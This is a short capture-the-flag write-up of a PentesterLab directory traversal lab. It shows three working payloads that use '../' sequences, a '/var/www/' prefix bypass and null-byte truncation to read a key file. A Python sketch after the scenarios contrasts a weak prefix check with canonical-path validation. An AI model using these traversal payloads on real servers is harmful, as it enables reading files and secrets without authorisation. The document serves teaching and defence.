Scenario 1:
We found a file name passed as a parameter value in the URL (Burp request):
GET /file.php?file=hacker.png HTTP/1.1
Here "file=hacker.png" is the value.
We tried moving up the directory tree and found the required file:
GET /file.php?file=../../pentesterlab.key HTTP/1.1
Scenario 2:
We found a path in the source of the page and requested it (Burp request):
GET /file.php?file=/var/www/ HTTP/1.1
Then we injected:
GET /file.php?file=/var/www/../../pentesterlab.key HTTP/1.1
And found the file.
Note: we can supply as many ../ sequences as we like, because the path cannot go above the root directory.
Scenario 3:
Use %00 (the null byte): everything after %00 is ignored, and everything before it is processed.
Main URL:
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=hacker
Tried, but does not work:
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=hacker.png
Tried, and works:
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=hacker.png%00
Final payload:
http://ptl-5cfb3683-8ddd2647.libcurl.so/file.php?file=../../../../../pentesterlab.key%00
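All three scenarios work because the server opens a path built from the file parameter without checking where that path finally resolves. The following is an added example, not code from the lab or from this write-up: a Python sketch that puts a prefix-only check (the kind Scenario 2 gets past) beside a check on the canonical path. BASE_DIR and both function names are assumptions made for the illustration.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/files"  # assumed directory the app is meant to serve from


def naive_prefix_check(value):
    """Weak check: only looks at how the string starts."""
    return value.startswith("/var/www/")


def resolve_requested_file(value, base_dir=BASE_DIR):
    """Return the canonical path inside base_dir, or None if rejected.

    `value` is the already URL-decoded `file` parameter.
    """
    # A NUL byte never belongs in a file name; reject it before any path
    # handling so nothing downstream can truncate the string at that point.
    if "\x00" in value:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ../ sequences and follows symlinks; joining an
    # absolute value discards base, which the containment test then catches.
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed sample values, taken from the three scenarios on this page.
SAMPLES = [
    "hacker.png",
    "../../pentesterlab.key",
    "/var/www/../../pentesterlab.key",
    unquote("hacker.png%00"),
]

if __name__ == "__main__":
    for v in SAMPLES:
        print(repr(v), naive_prefix_check(v), resolve_requested_file(v))
```

Only the first sample resolves to a path; the other three return None, including the Scenario 2 value that the prefix-only check accepts.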